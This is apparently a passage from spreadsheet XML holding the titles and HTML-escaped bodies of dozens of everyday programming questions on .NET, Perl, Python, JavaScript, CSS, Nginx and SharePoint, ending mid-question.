    <t xml:space="preserve">&lt;p&gt;I say properly because everyone I have spoken to in the past said running Django on IIS was a hack.  I had it working somewhat but it never did quite right and did feel like a hack.  I like python but had to give it up because I could never make Django work with IIS and Django was my excuse to use Python in production web apps.  But it was so messy that I could not in good conscience sell it to the group.  So, I figured why fight it, just stick to asp.net, IIS, roll your own or use frameworks from MS.  Just wondering if anything had changed.  BTW, not knocking asp.net.  I just wanted to use Python.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
&lt;p&gt;EDIT - Are there any new plans to officially support IIS yet?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Chained IF structure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Imagine this case where I have an object that I need to check a property.
However, the object can currently have a null value.&lt;/p&gt;
&lt;p&gt;How can I check these two conditions in a single "if" condition?&lt;/p&gt;
&lt;p&gt;Currently, I have to do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (myObject != null)
{
    if (myObject.Id != pId)
    {
        myObject.Id = pId;
        myObject.Order = pOrder;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (myObject != null &amp;amp;&amp;amp; myObject.Id != pId)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to evaluate the second condition only if the first was true.&lt;/p&gt;
&lt;p&gt;Maybe I'm missing something, and that's why I need your help ;-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Boxing/Unboxing and Nullable?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand that boxing and unboxing is about casting (real type to object... object to real type). But I do not understand what the MSDN say about it with the Nullable. Here is the text I do not understand:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;When a nullable type is boxed, the common language runtime automatically boxes the underlying value of the Nullable object, not the Nullable object itself. That is, if the HasValue property is true, the contents of the Value property is boxed. When the underlying value of a nullable type is unboxed, the common language runtime creates a new Nullable structure initialized to the underlying value. &lt;a href="http://msdn.microsoft.com/en-us/library/b3h38hb0.aspx"&gt;Source&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;When you change your object to a real type, the real type variable that was nullable will be the type of object? I do not get it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can't re-add Service Reference Properly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a WCF service up and running on a server. We have a proxy class that we add all service references to, and I tried to add my service reference there. However, it's not exposing all of the methods, specifically the interface, allowing me to create an instance of it (this is VS 2008). However, when I create a new project, and just add the service reference to it, it adds all of the interfaces properly.&lt;/p&gt;
&lt;p&gt;Any ideas on how to force the original project to re-add the project properly? Is there something in memory that is not getting cleared? I've tried deleting the reference, rebuilding, closing and re-opening the project, but it still comes out the same way.&lt;/p&gt;
&lt;p&gt;I've also tried deleting the project and re-creating it with no luck there either.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can IntelliJ IDEA open more than one editor window for files from the same project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can split editor panes horizontally or vertically, but it does not seem possible to view code in two separate physical windows.  I am aware that Idea can open multiple &lt;strong&gt;projects&lt;/strong&gt; in separate windows, but I'd like to be able to do this for two files in a &lt;strong&gt;single&lt;/strong&gt; project.  &lt;/p&gt;
&lt;p&gt;One answer suggested unpinning the tab, but I haven't been able to make that work (I'm on Mac OSX if that matters.)&lt;/p&gt;
&lt;p&gt;This seems like a basic feature in today's world of multi-headed workstations.  Before moving to an IDE I used to do this regularly with good old Emacs.  Is there some trick I am not aware of to make this happen?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Validating file types by regular expression</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a .NET webform that has a file upload control that is tied to a regular expression validator. This validator needs to validate that only certain filetypes should be allowed for upload (jpg,gif,doc,pdf)&lt;/p&gt;
&lt;p&gt;The current regular expression that does this is:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
^(([a-zA-Z]:)|(\\{2}\w+)\$?)(\\(\w[\w].*))(.jpg|.JPG|.gif|.GIF|.doc|.DOC|.pdf|.PDF)$
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;However this does not seem to be working...Can anyone give me a little reg ex help?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does the BitConverter return Bytes and how can I get the bits then?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As input I get an int (well, actually a string I should convert to an int).&lt;br /&gt;
This int should be converted to bits.&lt;br /&gt;
For each bit position that has a 1, I should get the position.&lt;br /&gt;
In my database, I want all records that have an int value field that has this position as value.&lt;br /&gt;
I currently have the following naive code that should ask my entity(holding the databaseValue) if it matches the position, but obviously doesn't work correctly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Byte[] bits = BitConverter.GetBytes(theDatabaseValue);
return bits[position].equals(1);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Firstly, I have an array of byte because there apparantly is no bit type. Should I use Boolean[] ?
Then, how can I fill this array?
Lastly, if previous statements are solved, I should just return bits[position]&lt;/p&gt;
&lt;p&gt;I feel like this should somehow be solved with bitmasks, but I don't know where to start..&lt;/p&gt;
&lt;p&gt;Any help would be appreciated&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server Agent: How to "sleep"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a scripting step in a scheduled task in SQL Server Agent 2005, I need to trigger a webscript that is running on a different server. I'm doing this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim ie 
Set ie = CreateObject( "InternetExplorer.Application" )
ie.navigate "...to my dreamscript"
' Wait till IE is ready
Do While ie.Busy
    (1)
Loop
ie.Quit
set ie = Nothing
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At (1) I would like to "sleep" (e.g. WScript.sleep(..)), but WScript is not available in this environment. Is there another way to "sleep" for a while?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Will Expression Blend relieve me from having to learn xaml?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't mind learning xaml and I'm sure I need to be familiar somewhat, but when I was first trying out Silverlight 1 with javascript it looked like a tremendous amount of overhead.  I decided to wait until tools matured and asp.net was added.  Well, asp.net has been added with Silverlight 2.0, and now I want to look at using it.  But, xaml, to me, still looks like a lot of work for each small step.  My experience with Flash seemed a lot more simpler for the graphics side of things (never liked ActionScript that much.)  Will $500 for Blend take care of much of my xaml concerns?  Can I use Visual Studio Express with the full version of Microsoft Expression Blend?&lt;/p&gt;
&lt;p&gt;Do I need Microsoft Expression Studio 2?&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A couple of questions on the architecture of Ruby</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am primarily a fluent .NET developer (as can be seen from the amount of posts and threads I make about .NET), but I thought it would be good to learn RoR.&lt;/p&gt;
&lt;p&gt;In doing so, I have a few questions about the architecture of the language (Ruby) and the framework (RoR):&lt;/p&gt;
&lt;p&gt;1) In .NET, every object is derived from System but inherits System.Object. So when I type System., I get a list of namespaces and then in those namespaces, classes and more namespaces.&lt;/p&gt;
&lt;p&gt;Does Ruby not have this sort of hierarchy?&lt;/p&gt;
&lt;p&gt;2) In some cases, I don't get the intellisense. For example, I wrote the class as outlined here (&lt;a href="http://wiki.rubyonrails.org/rails/pages/HowToSendEmailsWithActionMailer" rel="nofollow"&gt;http://wiki.rubyonrails.org/rails/pages/HowToSendEmailsWithActionMailer&lt;/a&gt;) but in the line  recipients user.email, nothing comes up when I type "user.".&lt;/p&gt;
&lt;p&gt;Any idea why?&lt;/p&gt;
&lt;p&gt;Thank&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you manage software serial keys, licenses, etc?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company is trying to find a tool that will track serial keys for software we have purchased (such as Office), as well as software that we write and sell.&lt;/p&gt;
&lt;p&gt;We want software that will allows us to associate a particular computer with the software on that computer and the serial key(s) and license(s) for that software. We'd also like to track history of the computer, such as when software is removed from a computer and moved to another computer.&lt;/p&gt;
&lt;p&gt;I've looked around Google and various software sites, but all of the results I've found are for licensing software and creating serial keys, not managing the serial keys that those tools generate. I know this problem has been solved; many companies license software and keep records of the serial keys they generate. So I'm curious if any of you have solved this same problem without writing your own custom software?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I forgot to mention, I am not asking about the merits of licensing software -- the software we write is not COTS and purchases are controlled at a contractual level. Still, we need to manage how serial keys are generated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex: when hiding components in flex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I set a component to visible=false the component hides, but how do I get it to take no space (get the container it belongs to to resize??)&lt;/p&gt;
&lt;p&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;mx:HBox width="100%" height="100%"&amp;gt;
...
&amp;lt;/mx:HBox&amp;gt;
&amp;lt;mx:HBox width="100%" id="boxAddComment" visible="false" &amp;gt;
    &amp;lt;mx:TextArea id="txtComment"/&amp;gt;
    &amp;lt;mx:Button label="Spara" click="addComment();"/&amp;gt;
&amp;lt;/mx:HBox&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;/p&gt;
&lt;p&gt;When boxAddComment is visible=false I want the first HBox to take 100% height.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Convert style-laden HTML tables to PDF, in .NET 1.1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have colleagues working on a .NET 1.1 project, where they obtain XML files from an external party and programmatically instruct iTextSharp to generate PDF content based on the XML data.&lt;/p&gt;
&lt;p&gt;The tricky part is, within this XML are segments of arbitrary HTML content. These are HTML code users copied and pasted from their Office applications. Still looks ok on a web browser, but when this HTML is fed into iTextSharp's HTMLWorker object to parse and convert into PDF objects, the formatting and alignment run all over the place in the generated PDF document. E.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;span id="mceBoundaryType" class="portrait"&amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;table border="0" cellspacing="0" cellpadding="0" width="636" class="MsoNormalTable"
    style="margin: auto auto auto 4.65pt; width: 477pt; border-collapse: collapse"&amp;gt;
    &amp;lt;tbody&amp;gt;
    	&amp;lt;tr style="height: 15.75pt"&amp;gt;
    		&amp;lt;td width="468" valign="bottom" style="padding-right: 5.4pt; padding-left: 5.4pt;
    			padding-bottom: 0in; width: 351pt; padding-top: 0in; height: 15.75pt; background-color: transparent;
    			border: #ece9d8"&amp;gt;
    			&amp;lt;p style="margin: 0in 0in 0pt" class="MsoNormal"&amp;gt;
    				&amp;lt;font face="Times New Roman"&amp;gt;&amp;amp;nbsp;&amp;lt;/font&amp;gt;&amp;lt;/p&amp;gt;
    		&amp;lt;/td&amp;gt;
    		&amp;lt;td colspan="3" width="168" valign="bottom" style="padding-right: 5.4pt; padding-left: 5.4pt;
    			padding-bottom: 0in; width: 1.75in; padding-top: 0in; height: 15.75pt; background-color: transparent;
    			border: #ece9d8"&amp;gt;
    			&amp;lt;p style="margin: 0in 0in 0pt; text-align: center" class="MsoNormal" align="center"&amp;gt;
    				&amp;lt;u&amp;gt;&amp;lt;font face="Times New Roman"&amp;gt;Group&amp;lt;/font&amp;gt;&amp;lt;/u&amp;gt;&amp;lt;/p&amp;gt;
    		&amp;lt;/td&amp;gt;
    	&amp;lt;/tr&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The tags are full of Style attributes, and iTextSharp does not support CSS and interpreting that attribute. What are some alternatives other iTextSharp users have tried to workaround this, or other feasible HTML-to-PDF components?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between these 2 function syntax types</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As the title says, whats the difference between&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyFunction = function() {
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function MyFunction() {
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Nothing?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Duplicate:&lt;/strong&gt; &lt;a href="http://stackoverflow.com/questions/336859/javascript-var-functionname-function-vs-function-functionname"&gt;http://stackoverflow.com/questions/336859/javascript-var-functionname-function-vs-function-functionname&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I execute a given function on every element of a complicated data structure in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to decode all the HTML entities in a complicated data structure. Basically I'm looking for a "super map()" function. Here's what I have so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sub _html_decode {
    my $self = shift;
    my $ref = shift;
    if (ref($ref) eq "HASH") {
        $self-&amp;gt;_html_decode_hash($ref)
    }
    if (ref($ref) eq "ARRAY") {
        $self-&amp;gt;_html_decode_array($ref);
    }
}
sub _html_decode_array {
    my $self = shift;
    my $ref = shift;
    unless (@$ref) {return;}
    foreach (0 .. (scalar(@$ref) - 1)) {
        if (ref($ref-&amp;gt;[$_]) eq "HASH") {
            $self-&amp;gt;_html_decode_hash($ref-&amp;gt;[$_]);
        }
        if (ref($ref-&amp;gt;[$_]) eq "ARRAY") {
            $self-&amp;gt;_html_decode_array($ref-&amp;gt;[$_]);
        }
        else {
            $ref-&amp;gt;[$_] = decode_entities($ref-&amp;gt;[$_]);
        }
    }
}
sub _html_decode_hash {
    my $self = shift;
    my $ref = shift;
    unless (%$ref) {return;}
    while (my ($k, $v) = each %$ref) {
        if (ref($v) eq "HASH") {
            $self-&amp;gt;_html_decode_hash($v);
        }
        if (ref($v) eq "ARRAY") {
            $self-&amp;gt;_html_decode_array($v)
        }
        else {
            $ref-&amp;gt;{$k} = decode_entities($v);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why can't Nginx POST to my Perl backend?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;EDIT: So I just found out that GET methods indeed work, but POST methods however do not work! That might be significant.&lt;/p&gt;
&lt;p&gt;So I am on Debian Etch, running Nginx. Nginx does not normally serve cgi/pl files so I have followed a guide to get my backend working.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://technotes.1000lines.net/?p=23" rel="nofollow"&gt;http://technotes.1000lines.net/?p=23&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My backend works fine on Apache but I had to install a module working with nginx (lib-www).&lt;/p&gt;
&lt;p&gt;It now works, but for some reason, POST/GET methods don't work.... To give an example, my backend is set up to accept Product SKU's in the url, and it just adds it to cart when you do it. Now, if I were to directly type in this url with this added value, it works fine, adds it to cart, everything works beautifully....&lt;/p&gt;
&lt;p&gt;However, when I add a product to the cart, all my product pages are setup to submit to my backend. It submits the exact same value I could type into my browser window, except it does not work (in contrast to just typing it into my url bar which DOES work).&lt;/p&gt;
&lt;p&gt;Now I'm thinking the perl wrapper code I'm using is slightly wrong or something? It is here:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://technotes.1000lines.net/fastcgi-wrapper.pl" rel="nofollow"&gt;http://technotes.1000lines.net/fastcgi-wrapper.pl&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I only made a couple of changes... I merely made a folder that it wants to install the socket in (but maybe it should be going in a different folder all together), and in my nginx conf I basically have it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;location ~ ^/cgi-bin/.*\.pl$ {
  gzip off;
  fastcgi_pass  unix:/var/run/nginx/perl_cgi-dispatch.sock;
  fastcgi_param SCRIPT_FILENAME /www/blah.com$fastcgi_script_name;
  include fastcgi_params;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My params are the same as they are in the article, and I only have the default mime type setup. Any ideas on why this is not working? I would be willing to provide any extra information you need as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Drop Down Box Not Fully Displayed (All Browsers)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;img src="http://farm4.static.flickr.com/3200/3116366800_570cc971b9_m.jpg" alt="Screenshot of Drop Down" /&gt;&lt;/p&gt;
&lt;p&gt;This would be my issue I have a drop down that's not displaying fully. I'm not sure even where to start so here's the HTML surronding the drop down and I'll provide the CSS also.&lt;/p&gt;
&lt;p&gt;HTML&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="add_item"&amp;gt;
 &amp;lt;ul class="vert"&amp;gt;
  &amp;lt;li&amp;gt;
   &amp;lt;ul class="horz"&amp;gt;
    &amp;lt;li class="name"&amp;gt;
     &amp;lt;select style="width: 195px; padding: 0px; margin: 0px;" disabled="disabled"&amp;gt;
      &amp;lt;option value=""&amp;gt;&amp;lt;/option&amp;gt;
      &amp;lt;option value="0"&amp;gt;0&amp;lt;/option&amp;gt;
     &amp;lt;/select&amp;gt;
    &amp;lt;/li&amp;gt;
    &amp;lt;li class="quantity"&amp;gt;
     &amp;lt;select style="width: 50px; padding: 0px; margin: 0px;" disabled="disabled"&amp;gt;
      &amp;lt;option value=""&amp;gt;&amp;lt;/option&amp;gt;
      &amp;lt;option value="0"&amp;gt;0&amp;lt;/option&amp;gt;
     &amp;lt;/select&amp;gt;
    &amp;lt;/li&amp;gt;
   &amp;lt;/ul&amp;gt;
  &amp;lt;/li&amp;gt;
 &amp;lt;/ul&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The reason the code has the drop down as being disabled is because it's dynamic, the surrounding HTML is the same except for having options to choose from and no longer being disabled.&lt;/p&gt;
&lt;p&gt;CSS&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;div#byitem ul.horz li.name {
background:transparent none repeat scroll 0 0;
display:block;
font-size:11px;
font-weight:bold;
width:195px;
}
div#byitem ul.horz {
background:transparent none repeat scroll 0 0;
clear:left;
list-style-type:none;
margin:0;
padding:0;
}
div#byitem ul.vert li {
background:transparent none repeat scroll 0 0;
height:14px;
margin:0;
padding:0;
}
div#byitem ul.vert {
background:transparent none repeat scroll 0 0;
list-style-type:none;
margin:0;
padding:0;
width:540px;
}
element.style {
margin-bottom:0;
margin-left:0;
margin-right:0;
margin-top:0;
padding-bottom:0;
padding-left:0;
padding-right:0;
padding-top:0;
width:195px;
}
#content form select {
margin:0 0 4px 4px;
z-index:1;
}
html, body, div, p, form, input, select, textarea, fieldset {
-x-system-font:none;
color:#333333;
font-family:Arial,Helvetica,Verdana,sans-serif;
font-size:11px;
font-size-adjust:none;
font-stretch:normal;
font-style:normal;
font-variant:normal;
font-weight:normal;
line-height:15px;
}
* {
margin:0;
padding:0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks for any suggestions.&lt;/p&gt;
&lt;h1&gt;Edit&lt;/h1&gt;
&lt;p&gt;I've added the CSS for the divs that the drop downs are contained in. Also changing the line height doesn't make a difference. The only difference between the two drop downs (Item and Quantity) is the width. Changing the width on Item doesn't make a difference.&lt;/p&gt;
&lt;p&gt;Took out the Add another item link as that was suspected to be a problem no change. Also I am doing my development in Firefox I just posted the screenshot from Safari.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Modifying the window opened by javascript's "window.open()" function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's my scenario:&lt;/p&gt;
&lt;p&gt;I have a page containing several links; each link is meant to open another window containing a pdf.  The catch is, I can't have that window directly go to the PDF because I do not want to make it apparent to the end user the PDF is located on another domain, and I need to name the PDF differently than how it would regularly show up.&lt;/p&gt;
&lt;p&gt;So then I have two pages:  One is blank, and only contains a frame to be used for displaying the pdfs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&amp;gt;
&amp;lt;html&amp;gt;
    &amp;lt;head&amp;gt;
    	&amp;lt;title&amp;gt;[PDF]&amp;lt;/title&amp;gt;
    &amp;lt;/head&amp;gt;
    &amp;lt;frameset&amp;gt;
    	&amp;lt;frame id="pdfFrame"&amp;gt;
    &amp;lt;/frameset&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And on the page with the links, I have the following function that calls this page (we'll call the above page "pdf.html"):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function OpenWindow(pdfTitle, pdfLocation)
{
    var myWindow = window.open("pdf.html", "", "toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=1,resizable=1,width=700,height=600");
    myWindow.document.title = pdfTitle;	
    myWindow.document.getElementById('pdfFrame').src = pdfLocation;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For the most part, this seems to work fine; however, on occasion the pop up window will not be loaded prior to the lines above that setup the title/frame source, and it will crash (or not load properly, at least).&lt;/p&gt;
&lt;p&gt;My question is, is there a simple way for me to add in some sort of blocking call after opening the window, to wait until we're ready to run this code?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Office documents prompt for login in anonymous SharePoint site</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a MOSS 07 site that is configured for anonymous access. There is a document library within this site that also has anonymous access enabled. When an anonymous user clicks on a PDF file in this library, he or she can read or download it with no problem. When a user clicks on an Office document, he or she is prompted with a login box. The user can cancel out of this box without entering a log in, and will be taken to the document.&lt;/p&gt;
&lt;p&gt;This happens in IE but not FireFox.&lt;/p&gt;
&lt;p&gt;I see some references to this question on the web but no clear solutions:
&lt;a href="http://www.microsoft.com/communities/newsgroups/en-us/default.aspx?dg=microsoft.public.sharepoint.windowsservices.development&amp;amp;tid=5452e093-a0d7-45c5-8ed0-96551e854cec&amp;amp;cat=en_US_CC8402B4-DC5E-652D-7DB2-0119AFB7C906&amp;amp;lang=en&amp;amp;cr=US&amp;amp;sloc=&amp;amp;p=1"&gt;http://www.microsoft.com/communities/newsgroups/en-us/default.aspx?dg=microsoft.public.sharepoint.windowsservices.development&amp;amp;tid=5452e093-a0d7-45c5-8ed0-96551e854cec&amp;amp;cat=en_US_CC8402B4-DC5E-652D-7DB2-0119AFB7C906&amp;amp;lang=en&amp;amp;cr=US&amp;amp;sloc=&amp;amp;p=1&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.sharepointu.com/forums/t/5779.aspx"&gt;http://www.sharepointu.com/forums/t/5779.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.eggheadcafe.com/software/aspnet/30817418/anonymous-users-getting-p.aspx"&gt;http://www.eggheadcafe.com/software/aspnet/30817418/anonymous-users-getting-p.aspx&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java equivalent to PHP's preg_replace_callback</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in the process of moving an application from PHP to Java and there is heavy use of regular expressions in the code.  I've run across something in PHP that doesn't seem to have a java equivalent:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;preg_replace_callback()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For every match in the regex, it calls a function that is passed the match text as a parameter.  As an example usage:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$articleText = preg_replace_callback("/\[thumb(\d+)\]/",'thumbReplace', $articleText);
# ...
function thumbReplace($matches) {
   global $photos;
   return "&amp;lt;img src=\"thumbs/" . $photos[$matches[1]] . "\"&amp;gt;";
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What would be the ideal way to do this in Java?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to restrict client control area in a custom WinForms control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom control that uses a designer I've inherited from ParentControlDesigner to allow child controls to be dropped.  I'm not using any internal designers, just straightforward single-parent stuff.&lt;/p&gt;
&lt;p&gt;This control draws a "header", so I'm trying to do three things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Have child controls dock to the bottom of the header instead of the top of the control, when set to Top or Fill.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Have child controls snap to the bottom of the header when dragging with the mouse, instead of the top of the control.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Prevent controls from being dragged onto the header area, period (I have a feeling this may not be possible).&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;(1) is the most important - I know it's possible because I've seen other controls that do it.  (2) would also be a major help.  (3) I don't care about that much, it would just be nice to have.&lt;/p&gt;
&lt;p&gt;Would anyone be able to point me in the right direction on how to implement these rules, &lt;b&gt;without&lt;/b&gt; having to resort to a clumsy sub-panel and the InternalControlDesigner methods?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the efficiency and quality of this shuffling algorithm?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This recent question about &lt;a href="http://stackoverflow.com/questions/375351/most-efficient-way-to-randomly-sort-shuffle-a-list-of-integers-in-c"&gt;sorting randomly using C#&lt;/a&gt; got me thinking about the way I've sometimes shuffled my arrays in Perl.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@shuffled = sort { rand() &amp;lt;=&amp;gt; rand() } @array;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The proposed solution in the mentioned question is &lt;a href="http://en.wikipedia.org/wiki/Fisher-Yates_shuffle" rel="nofollow"&gt;Fisher-Yates shuffle&lt;/a&gt;, which works in a linear time.&lt;/p&gt;
&lt;p&gt;The question is: how efficient is my snippet and is such shuffle "really" random?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SPARQL query - Class and subclass give a class name and namespace</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can i get all the class properties and its sub classes with properties from an RDF datasource using SPARQL query given a class name and namespace?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does one test a file to see if it's a valid XML file before loading it with XDocument.Load()?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm loading an XML document in my C# application with the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XDocument xd1 = new XDocument();
xd1 = XDocument.Load(myfile);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but before that, I do test to make sure the file exists with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;File.Exists(myfile);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But... is there an (easy) way to test the file before the XDocument.Load() to make sure it's a valid XML file?  In other words, my user can accidentally click on a different file in the file browser and trying to load, say, a .php file causes an exception.  &lt;/p&gt;
&lt;p&gt;The only way I can think of is to load it into a StreamWriter and simple do a text search on the first few characters to make sure they say "
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;-Adeena&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Prevent ftplib from Downloading a File in Progress?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a ftp system setup to monitor/download from remote ftp servers that are not under our control. The script connects to the remote ftp, and grabs the file names of files on the server, we then check to see if its something that has already been downloaded. If it hasn't been downloaded then we download the file and add it to the list.&lt;/p&gt;
&lt;p&gt;We recently ran into an issue, where someone on the remote ftp side, will copy in a massive single file(&gt;1GB) then the script will wake up see a new file and begin downloading the file that is being copied in.&lt;/p&gt;
&lt;p&gt;What is the best way to check this? I was thinking of grabbing the file size waiting a few seconds checking the file size again and see if it has increased, if it hasn't then we download it. But since time is of the concern, we can't wait a few seconds for every single file set and see if it's file size has increased. &lt;/p&gt;
&lt;p&gt;What would be the best way to go about this, currently everything is done via pythons ftplib, how can we do this aside from using the aforementioned method.&lt;/p&gt;
&lt;p&gt;Yet again let me reiterate this, we have 0 control over the remote ftp sites.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
&lt;p&gt;UPDATE1:&lt;/p&gt;
&lt;p&gt;I was thinking what if i tried to rename it... since we have full permissions on the ftp, if the file upload is in progress would the rename command fail?&lt;/p&gt;
&lt;p&gt;We don't have any real options here... do we?&lt;/p&gt;
&lt;p&gt;UPDATE2:
Well here's something interesting some of the ftps we tested on appear to automatically allocate the space once the transfer starts.&lt;/p&gt;
&lt;p&gt;E.g. If i transfer a 200mb file to the ftp server. While the transfer is active if i connect to the ftp server and do a size while the upload is happening. It shows 200mb for the size. Even though the file is only like 10% complete.&lt;/p&gt;
&lt;p&gt;Permissions also seem to be randomly set the FTP Server that comes with IIS sets the permissions AFTER the file is finished copying. While some of the other older ftp servers set it as soon as you send the file.&lt;/p&gt;
&lt;p&gt;:'(&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.Net Localization &amp; Bound controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I localize an asp.net page that is using bound controls (DetailsView, etc) that has TemplateFields bound using the &amp;lt;%# Bind() #&gt; syntax, after the localization all of the bindings are removed and I have to go back in &amp;amp; rebind everything.  I'm creating the localized resource file by switching to design view, then Tools / Generate Local Resource from the menu.&lt;/p&gt;
&lt;p&gt;Has anyone else seen this problem, and if so, do you have any suggestions for a workaround?&lt;/p&gt;
&lt;p&gt;Before:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:TemplateField HeaderText="First Name:"&amp;gt;
    &amp;lt;InsertItemTemplate&amp;gt;
